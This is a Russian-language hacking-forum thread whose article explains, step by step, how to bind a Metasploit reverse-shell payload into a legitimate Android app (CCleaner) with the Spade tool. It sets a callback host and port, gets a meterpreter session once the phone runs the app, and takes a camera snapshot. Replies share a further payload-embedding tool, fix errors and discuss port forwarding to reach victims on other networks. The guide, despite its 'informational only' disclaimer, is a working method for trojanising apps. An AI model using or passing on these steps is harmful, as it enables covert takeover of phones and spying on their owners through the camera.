• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Взлом Android-устройства

Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта , попробуем, для начала, на ней.

Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
Код:
git clone https://github.com/suraj-root/spade.git
upload_2016-10-17_20-20-41.png


После успешного выполнения команды, вводим следующее:

> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

> lhost > 192.168.0.103

> lport > 4444

upload_2016-10-17_20-21-32.png


upload_2016-10-17_20-21-40.png


Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.

upload_2016-10-17_20-22-6.png


Видим привилегии, которые нам доступны:

upload_2016-10-17_20-22-32.png


Готовый файл сохраняется в директории /root/spade

upload_2016-10-17_20-22-51.png


На запрос этой настройки отвечаем утвердительно:

upload_2016-10-17_20-23-18.png


Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:

upload_2016-10-17_20-23-36.png


Попробуем осмотреться в системе:

upload_2016-10-17_20-23-55.png


Все работает, теперь можно испытать работу, к примеру, камеры:
Код:
webcam_snap
upload_2016-10-17_20-24-23.png


И эта команда срабатывает успешно:

upload_2016-10-17_20-24-45.png


На этом все, спасибо за внимание.

Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал -
 
Последнее редактирование:

fuzscore

Grey Team
21.09.2016
77
181
BIT
0
за статью спасибо , познавательно. Глаза от стольких мониторов не разбегаются?):eek:
 

z3RoTooL

Grey Team
28.02.2016
802
696
BIT
0
Наши с тобой темы часто перекликаются :) Чтоб не плодить одно и то же, я добавлю к твоему рассказу ещё одну софтину для этих целей. Написана на RUBY, скачать можно прям отсюда.
Ну и небольшой видео обзор к ней.
Работаем в команде )))

 

Вложения

  • apk-embed-payload.zip
    2,5 КБ · Просмотры: 379
Последнее редактирование:
  • Нравится
Реакции: Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 345
BIT
0
Наши с тобой темы часто перекликаются :) Чтоб не плодить одно и то же, я добавлю к твоему рассказу ещё одну софтину для этих целей. Написана на RUBY, скачать можно прям отсюда.
Ну и небольшой видео обзор к ней.

:) Ага, надо протестить на досуге
 
  • Нравится
Реакции: z3RoTooL

z3RoTooL

Grey Team
28.02.2016
802
696
BIT
0
ну эта софтина на руби сама подписывает, а если руками - вот
 
  • Нравится
Реакции: ghost
A

areez

Господа, проблема возникла
на стадии пэйлода выдает такое и все тут
[*] Injecting payload...
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit»: Нет такого файла или каталога
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit/stage»: Нет такого файла или каталога
cp: указанная цель 'CCleaner_v1/smali/com/metasploit/stage/' не является каталогом
[-] [Errno 2] No such file or directory: 'CCleaner_v1/AndroidManifest.xml'
Пробовал разные апк, в пустую
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 345
BIT
0
Господа, проблема возникла
на стадии пэйлода выдает такое и все тут
[*] Injecting payload...
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit»: Нет такого файла или каталога
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit/stage»: Нет такого файла или каталога
cp: указанная цель 'CCleaner_v1/smali/com/metasploit/stage/' не является каталогом
[-] [Errno 2] No such file or directory: 'CCleaner_v1/AndroidManifest.xml'
Пробовал разные апк, в пустую
Привет, скриншот бы увидеть...
 
M

MAdDog719

я так понимаю что если указать внешний IP и на роутере настроить правило переадресации порта на машину с кали (ну как это было рассказано в статье по Veali и Office) тогда смартфрну не нужуно будет находиться с мной в одной сети(подключенными к одному роутеру)? Сессия будет открыта как только как только запустишь приложение на смартфоне.
 
A

areez

Опишите пожалуйста решение.
файл был дюже длинного названия, судя по всему, т.е. ccleaner_v1234... и тд , я попросту переименовал файл в ccleaner.apk и все

ПРоблема с отсутсвием ссleaner-final.apk АКТУальна!
 
Последнее редактирование модератором:
  • Нравится
Реакции: The Codeby

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 345
BIT
0
я так понимаю что если указать внешний IP и на роутере настроить правило переадресации порта на машину с кали (ну как это было рассказано в статье по Veali и Office) тогда смартфрну не нужуно будет находиться с мной в одной сети(подключенными к одному роутеру)? Сессия будет открыта как только как только запустишь приложение на смартфоне.
По идее, должно работать. Но не проверял. Если проверите, отпишитесь потом, пожалуйста
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!